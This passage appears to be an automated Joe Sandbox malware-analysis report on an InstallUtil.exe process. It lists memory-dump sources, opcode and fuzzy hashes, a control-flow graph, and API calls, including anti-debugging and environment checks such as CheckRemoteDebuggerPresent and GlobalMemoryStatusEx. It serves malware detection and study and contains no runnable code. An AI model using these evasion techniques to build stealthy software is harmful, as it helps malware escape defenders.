                                                  control_flow_graph 3008 60ff218-60ff237 3009 60ff239-60ff246 call 60fe15c 3008->3009 3010 60ff263-60ff267 3008->3010 3017 60ff25c 3009->3017 3018 60ff248 3009->3018 3011 60ff27b-60ff2bc 3010->3011 3012 60ff269-60ff273 3010->3012 3019 60ff2be-60ff2c6 3011->3019 3020 60ff2c9-60ff2d7 3011->3020 3012->3011 3017->3010 3066 60ff24e call 60ff4b0 3018->3066 3067 60ff24e call 60ff4c0 3018->3067 3019->3020 3022 60ff2fb-60ff2fd 3020->3022 3023 60ff2d9-60ff2de 3020->3023 3021 60ff254-60ff256 3021->3017 3024 60ff398-60ff410 3021->3024 3025 60ff300-60ff307 3022->3025 3026 60ff2e9 3023->3026 3027 60ff2e0-60ff2e7 call 60fe168 3023->3027 3058 60ff454-60ff458 3024->3058 3059 60ff412-60ff451 3024->3059 3029 60ff309-60ff311 3025->3029 3030 60ff314-60ff31b 3025->3030 3028 60ff2eb-60ff2f9 3026->3028 3027->3028 3028->3025 3029->3030 3032 60ff31d-60ff325 3030->3032 3033 60ff328-60ff331 call 60f799c 3030->3033 3032->3033 3039 60ff33e-60ff343 3033->3039 3040 60ff333-60ff33b 3033->3040 3041 60ff345-60ff34c 3039->3041 3042 60ff361-60ff36e 3039->3042 3040->3039 3041->3042 3044 60ff34e-60ff35e call 60fdfd8 call 60fe178 3041->3044 3048 60ff391-60ff397 3042->3048 3049 60ff370-60ff38e 3042->3049 3044->3042 3049->3048 3060 60ff45a-60ff45d 3058->3060 3061 60ff460-60ff48b GetModuleHandleW 3058->3061 3059->3058 3060->3061 3063 60ff48d-60ff493 3061->3063 3064 60ff494-60ff4a8 3061->3064 3063->3064 3066->3021 3067->3021
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 060FF47E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: bdd577adf1127dfcea2d001cadeb1f271fc4bc9b764585f31c016f80402f61f5
                                                  • Instruction ID: b0dbcd2f6d4407e36c2677a75abdabdec5574f447df80392374f38866263bbb5
                                                  • Opcode Fuzzy Hash: bdd577adf1127dfcea2d001cadeb1f271fc4bc9b764585f31c016f80402f61f5
                                                  • Instruction Fuzzy Hash: E6815670A10B469FD7A4DF2AD44079ABBF1FF88304F00892ED586DBA50DB75E845CB91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6e9596a1deb81bf4bbda3cd34b7a0dc58cd0567c74e2168cf43e7d97ec5b80c
                                                  • Instruction ID: cc7d4b31f2855894457a4f8780e162502a3babd341dfabe574948ffa8fa73e10
                                                  • Opcode Fuzzy Hash: b6e9596a1deb81bf4bbda3cd34b7a0dc58cd0567c74e2168cf43e7d97ec5b80c
                                                  • Instruction Fuzzy Hash: D7414572D0439A8FCB10CFA9D8046DEBBF1EF85320F1486ABD444E7281D7789844CB91
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F70E7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 93e232db68c22736cc0e874bdf07eee2d3f50cd5d7855077e3068636f575c905
                                                  • Instruction ID: cac1fb6757813bd0a1cefc1ca9bb0f9f249237a48da3d233fdf9db380e6f22ff
                                                  • Opcode Fuzzy Hash: 93e232db68c22736cc0e874bdf07eee2d3f50cd5d7855077e3068636f575c905
                                                  • Instruction Fuzzy Hash: 1B2105B5900249EFDB10CFAAD984ADEFFF8EB48310F14841AE914A3350D375A940CFA1
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00BC7127
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: c5a7d219da5df30c79ed74936cd143121d66b968d676261aae43e6e723cca1c7
                                                  • Instruction ID: 747b78b1cd4d36aaf9a844e990947ed2a77a0e7abfafc9725974e72b50b00b59
                                                  • Opcode Fuzzy Hash: c5a7d219da5df30c79ed74936cd143121d66b968d676261aae43e6e723cca1c7
                                                  • Instruction Fuzzy Hash: 222105B68002598FCB10CF9AD984BEEBBF5EF49310F29845AE455B7350D7789944CF60
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F70E7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: e461b606e0d7b847316f89ccf96b802cec7b6ae186c49c119748604dc42c0b67
                                                  • Instruction ID: 3f6322377ba29354d75460fc99f6062fc52e5b5f09ed25331a3f9e41bf4cc657
                                                  • Opcode Fuzzy Hash: e461b606e0d7b847316f89ccf96b802cec7b6ae186c49c119748604dc42c0b67
                                                  • Instruction Fuzzy Hash: 3021C2B5910249DFDB10CFAAD984ADEFFF8EB48320F14841AE918A3350D375A944DFA5
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,060FF4F9,00000800,00000000,00000000), ref: 060FF6EA
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 660c12de998c0a5c60b7315740cdf9c4d1268329ba14a01e1101bf961d23a718
                                                  • Instruction ID: e5f9fbc5a144e80a5d45054ad4eb964bf99b78dd26b24bdbbe4526750071c6eb
                                                  • Opcode Fuzzy Hash: 660c12de998c0a5c60b7315740cdf9c4d1268329ba14a01e1101bf961d23a718
                                                  • Instruction Fuzzy Hash: 362114B6C002099FDB10CF9AD884ADEFBF8FB48320F10841AE919A7610C775A945CFA5
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,060FF4F9,00000800,00000000,00000000), ref: 060FF6EA
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: a36b515087eb8a51bed7aac9c57d14a65e0f15dac46ddbac1a0ad1520c350f16
                                                  • Instruction ID: b2448ce14aaeebdc2bdfeaf8998696e40aee5a8dc874628bb62af572c981cfe8
                                                  • Opcode Fuzzy Hash: a36b515087eb8a51bed7aac9c57d14a65e0f15dac46ddbac1a0ad1520c350f16
                                                  • Instruction Fuzzy Hash: 2B1103B68002499FDB20CF9AD844A9EFBF8EB48310F10842AE919A7610C775A545CFA5
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00BCF3F7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 94e6b064b016412b4c7cc66b6f86dcacbe20954185d9ae7556baefc0a7e677e4
                                                  • Instruction ID: 0ec9937ee7430970e9c83179a1ae38fe4e2af5d0e869c0df3a2b98be7bc43884
                                                  • Opcode Fuzzy Hash: 94e6b064b016412b4c7cc66b6f86dcacbe20954185d9ae7556baefc0a7e677e4
                                                  • Instruction Fuzzy Hash: 6011F6B1C0065A9FCB10CF9AD944BDEFBF4EF48320F14816AD918A7241D778A944CFA5
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 060FF47E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 25169350e31c9436eb8943fe5a09e6d9818d6f6b5e4b2d478f644b18d44763be
                                                  • Instruction ID: 50473c1aa08573cb68a218cbeb6c65fe794afa65bf9da09bd6d8319b4f079466
                                                  • Opcode Fuzzy Hash: 25169350e31c9436eb8943fe5a09e6d9818d6f6b5e4b2d478f644b18d44763be
                                                  • Instruction Fuzzy Hash: B411E0B6C007498FCB20CF9AD944ADEFBF8EB88324F14841AD919A7750D379A545CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XPhq
                                                  • API String ID: 0-3379001060
                                                  • Opcode ID: 91baa0ec86f4591b4097231d4198111df5ef4c08f10903b26cc0cf6ff6a1a9aa
                                                  • Instruction ID: 524b530104d2bd73028167b54ad06e0a43cbcaca1e041e858da668e88fcbb336
                                                  • Opcode Fuzzy Hash: 91baa0ec86f4591b4097231d4198111df5ef4c08f10903b26cc0cf6ff6a1a9aa
                                                  • Instruction Fuzzy Hash: 73414D75F002099FEF45DFE5C954BAEBAF6EF88300F20852AE106AB395DB715C058B91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: 23fcac3b5071bda4ab8cce9b551e5cf3d8d238e894cd509d30b26d11c713b6e1
                                                  • Instruction ID: c701ce969c847b77ccbbf88dde43781538b45d0e6d7bea33f569000a461c8a9c
                                                  • Opcode Fuzzy Hash: 23fcac3b5071bda4ab8cce9b551e5cf3d8d238e894cd509d30b26d11c713b6e1
                                                  • Instruction Fuzzy Hash: D1418270E007499FEF15DFB4D9546AEBBB2FF85300F104929E406EB291EBB09946CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: c80ebc6056524a1947bc6b51fc54943cb2c8205d34b65e5de8041f0cdecd63f9
                                                  • Instruction ID: d425d1be896026c01b6970e17e690ce67c5adabeadc3bd6ecd06afccdfd659ba
                                                  • Opcode Fuzzy Hash: c80ebc6056524a1947bc6b51fc54943cb2c8205d34b65e5de8041f0cdecd63f9
                                                  • Instruction Fuzzy Hash: 51415170E006499BEF55DFE5D9547AEBBB2FF85300F104929E406EB284DFB0A942CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: 82a81ba5805e362d98e743d09aa3301221fbde711b9bfdb742673c867fe0d5d1
                                                  • Instruction ID: b7773f360d3979483a6c851bd3932371f8463cc285b4d8811d171cd956eb0f6a
                                                  • Opcode Fuzzy Hash: 82a81ba5805e362d98e743d09aa3301221fbde711b9bfdb742673c867fe0d5d1
                                                  • Instruction Fuzzy Hash: E431DD31B002058FEF59ABB4C95876F7BA2AF89200F144969D406DB3D2DF74DE06CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: 9c98310e1f653f3d709417f0291f9d115bc2b4352378c216b8eaa74b1c405ebd
                                                  • Instruction ID: 51810f1d982780db19175a521e39b8a0646668f86cbf97e62984c822f6abe276
                                                  • Opcode Fuzzy Hash: 9c98310e1f653f3d709417f0291f9d115bc2b4352378c216b8eaa74b1c405ebd
                                                  • Instruction Fuzzy Hash: DC31F030B002058FEF59ABB4C95866F7BA2EFC8200B644829D406DB396DF71DE46CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Ohq
                                                  • API String ID: 0-1367279102
                                                  • Opcode ID: 1888f9d51699d7c5f53648542f16e06c5e423b115b40ecc60f720b68007e0488
                                                  • Instruction ID: 258eaed47adfd6f1daa0afb843a1722de8811a08dba1b633d977f2143e472ba7
                                                  • Opcode Fuzzy Hash: 1888f9d51699d7c5f53648542f16e06c5e423b115b40ecc60f720b68007e0488
                                                  • Instruction Fuzzy Hash: 53F0FE30A20119DFEF54DF94E999BADBBB2FF88700F204519E502A7294CBB45C45CBC0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e809273fb28f06e30f38f979c0ade5e0b7595793e15f1dda8612656b76b0bfa
                                                  • Instruction ID: 531b25f216912a6153e98ecf1203dfca6cd52058d04a9d2c828456fc4f5a2fca
                                                  • Opcode Fuzzy Hash: 9e809273fb28f06e30f38f979c0ade5e0b7595793e15f1dda8612656b76b0bfa
                                                  • Instruction Fuzzy Hash: BDA1C474F141098BFF60CB6CD5907AEB6B6EB89300F60842AE409E73D5CB76CD818792
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6302b9abea881b5e0388879137c1926bd5745d9b66fb00782fa81933f6e610e5
                                                  • Instruction ID: 5cfd50d85968e7d396aff87ae6b0321ddbef0d76653aaaea95b1047b957fa6a0
                                                  • Opcode Fuzzy Hash: 6302b9abea881b5e0388879137c1926bd5745d9b66fb00782fa81933f6e610e5
                                                  • Instruction Fuzzy Hash: B961B2B1F100114FDF559A6EC84466FBAEBAFC4220B554439E40EDB364DEBADC028BD1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e26088772a6452f4f377dc0ea6292a979b5b95c524c5df18db1dd6e00c2cc45b
                                                  • Instruction ID: ac72bbe5de36cb33e20daa70affd10cef5b2838737ba0b0f22cff19e4db12452
                                                  • Opcode Fuzzy Hash: e26088772a6452f4f377dc0ea6292a979b5b95c524c5df18db1dd6e00c2cc45b
                                                  • Instruction Fuzzy Hash: 7C812D34B102068BEF54DFA8D5947AEB7F6AFC4300F108429D50AEB399DB75DC468B51
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bc2508665a47c1a4e94b888156206ff87a7b09020cb36fd1a59dd405e6c5f83
                                                  • Instruction ID: 27c69e197e79c5708b5e04137ba886b22b8aa5c959d9e20855c658f17416ee27
                                                  • Opcode Fuzzy Hash: 9bc2508665a47c1a4e94b888156206ff87a7b09020cb36fd1a59dd405e6c5f83
                                                  • Instruction Fuzzy Hash: AF914E74E006198BDF60DF68C880B9DB7B1FF89310F208699D549BB395DB70AA85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54fa97020030de7b909734f80c8794c59f21e5dae3b4f4335b6719c3c8f09efb
                                                  • Instruction ID: 31b6e85b9bf80624bcbc62934a755cc3f86a3e10abc5f704bbcc6d9801a48e72
                                                  • Opcode Fuzzy Hash: 54fa97020030de7b909734f80c8794c59f21e5dae3b4f4335b6719c3c8f09efb
                                                  • Instruction Fuzzy Hash: B8812D34B102058BEF54DBB8D5947AEB7F6AFC4300F108429D50AEB399DB75DC428B51
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4651ef9fbe79a3a4e888287a73ec5b4d62984a6f5a85e95249de8e39b823f0e
                                                  • Instruction ID: bfe26fa6b1fea577c8acdf2600e91f8c70933a312dd81795482a1492503d9a01
                                                  • Opcode Fuzzy Hash: a4651ef9fbe79a3a4e888287a73ec5b4d62984a6f5a85e95249de8e39b823f0e
                                                  • Instruction Fuzzy Hash: 50914F74E006198BDF60DF68C880B9DB7B1FF89310F208599D549BB395DB70AA85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fd06dcebbbf3464d14dfe13b8d1a020fa959fc97dc5d02dbc0cbdb9fe4aafa9
                                                  • Instruction ID: f859f2c915a20d910806a6f45ca59e72e95287a206316356747f2eb054e0895a
                                                  • Opcode Fuzzy Hash: 4fd06dcebbbf3464d14dfe13b8d1a020fa959fc97dc5d02dbc0cbdb9fe4aafa9
                                                  • Instruction Fuzzy Hash: 06712C71A002089FDF55DFA9D980A9DBBF6FF88300F148929E419EB395DB70E946CB50
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 845f52f5dbd17da4b7913306bc9ef6462ef0dde902a6816ca1ad212cb521fb74
                                                  • Instruction ID: 7169225db34f0099e4715ba8f4a4e5f874eacf00114093513044482fcf412894
                                                  • Opcode Fuzzy Hash: 845f52f5dbd17da4b7913306bc9ef6462ef0dde902a6816ca1ad212cb521fb74
                                                  • Instruction Fuzzy Hash: B2711B71A002089FDF55DBA9C980A9EBBF6FF88300F548829E415EB395DB70ED46CB51
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ec70df8da3c8ab01e2a9141313a737d2cf14757ae659479fd94a261b41033af
                                                  • Instruction ID: 4ed59d3de7cd6c9d8d19aa238b06024a9da4cf3d4f391f5c40aa49f66eb24216
                                                  • Opcode Fuzzy Hash: 6ec70df8da3c8ab01e2a9141313a737d2cf14757ae659479fd94a261b41033af
                                                  • Instruction Fuzzy Hash: 0C51D332E001059FEF24EFB8E4466ADB7B2FF85315F11886AE506D7291DF758846CB81
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e77a7e53b33e13a006d9451978c37879d89654d42c4dae5e2cabc85bf74d8033
                                                  • Instruction ID: 887df86359caaf51add1c2c8de1e9cd887274c197bd82ed53e6ed38ebb8e4e36
                                                  • Opcode Fuzzy Hash: e77a7e53b33e13a006d9451978c37879d89654d42c4dae5e2cabc85bf74d8033
                                                  • Instruction Fuzzy Hash: 7251F874B201045FFF75666CD99676E3696D789700F60043BE50ACB3DACBADCC4243A2
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 460344181ad91c9bf9f87f013b48b88547d7ddbc66d30606cb5fe31b96e2f2fc
                                                  • Instruction ID: d0e86f909a293eb111cd8cd848ee75271132e8edd702f8318d8f54db5b87fb04
                                                  • Opcode Fuzzy Hash: 460344181ad91c9bf9f87f013b48b88547d7ddbc66d30606cb5fe31b96e2f2fc
                                                  • Instruction Fuzzy Hash: 6551A170F10104DFEF64DB69C984B6EBAE2EB89310F208529E50ADB3A1DB75DC418B91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b34e45d8b767c329690572b4ca532021d667229b5ca8d3779bffc0185944b59
                                                  • Instruction ID: e2d655b053c8d15913ac2266e3a42262195d0cf651f2eb288d8f3f8db0a4732f
                                                  • Opcode Fuzzy Hash: 0b34e45d8b767c329690572b4ca532021d667229b5ca8d3779bffc0185944b59
                                                  • Instruction Fuzzy Hash: BA51E474B201045FFF75666CD89676F365AD789700F60442BE90ACB3D9CBA9CC4253A2
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eebf2d61d4c2fc2fe8573fd37a2f2586628790342742455d9270c4ef55b2baf0
                                                  • Instruction ID: 453d996d8490ca425d6e4b670c10a1c53d1477293670f39b813dc597e7f955b0
                                                  • Opcode Fuzzy Hash: eebf2d61d4c2fc2fe8573fd37a2f2586628790342742455d9270c4ef55b2baf0
                                                  • Instruction Fuzzy Hash: 4A51B374E101099BEF64CB68C6807AEBBB3FB49310F248926E455DB2C5C7B4D891DF91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d75d5581e8b36f462cedabcf877b9176ebb5429d82692f7da05caf47fad12e8f
                                                  • Instruction ID: 9c8cf98d38d31e60de13050de43d64c230735ffd2b0db4833804cfbbdd1d7946
                                                  • Opcode Fuzzy Hash: d75d5581e8b36f462cedabcf877b9176ebb5429d82692f7da05caf47fad12e8f
                                                  • Instruction Fuzzy Hash: 72415E71E006099FEF70CEA9D980AAFF7B6FB84310F10492AE116D7690D770A9858F91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 346dc0005fe3253e6d7ced045d9cc17e1d9321d94a7351bac152c6cff7354aed
                                                  • Instruction ID: b5f650762dbb1d73b45dbe6d98492321d204aba920b547676777d09dcb993e00
                                                  • Opcode Fuzzy Hash: 346dc0005fe3253e6d7ced045d9cc17e1d9321d94a7351bac152c6cff7354aed
                                                  • Instruction Fuzzy Hash: A7418C30E10104DFEF54DB68C584B9EBBF2AB89310F24856AE10ADB3A1DB75DC45CB81
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94db43bfcbbe01fb2839e4f657ef473155d8926e55ee7a5ee45be4df5137cc86
                                                  • Instruction ID: c236f8cdbf6b22241731bb5bd5dd4419a88f32c72352d51af556a6b362d00258
                                                  • Opcode Fuzzy Hash: 94db43bfcbbe01fb2839e4f657ef473155d8926e55ee7a5ee45be4df5137cc86
                                                  • Instruction Fuzzy Hash: 63316530E106069BEF19DFA9D89469EB7B2FF89310F10C519E816EB394DBB0AD41CB50
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315051307.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_aed000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 247b84861568274aee3f4fc8c76647ad395cd068afad5750c4ce2786744f562c
                                                  • Instruction ID: f924c28a802c3ced42d06af02308404c253becfe3b8035445295e47e8e85d3c9
                                                  • Opcode Fuzzy Hash: 247b84861568274aee3f4fc8c76647ad395cd068afad5750c4ce2786744f562c
                                                  • Instruction Fuzzy Hash: 9C314F7550E3C49FC703CB24C994711BF71AF47214F2985DBD8898F2A7C229980ACB62
                                                  Memory Dump Source
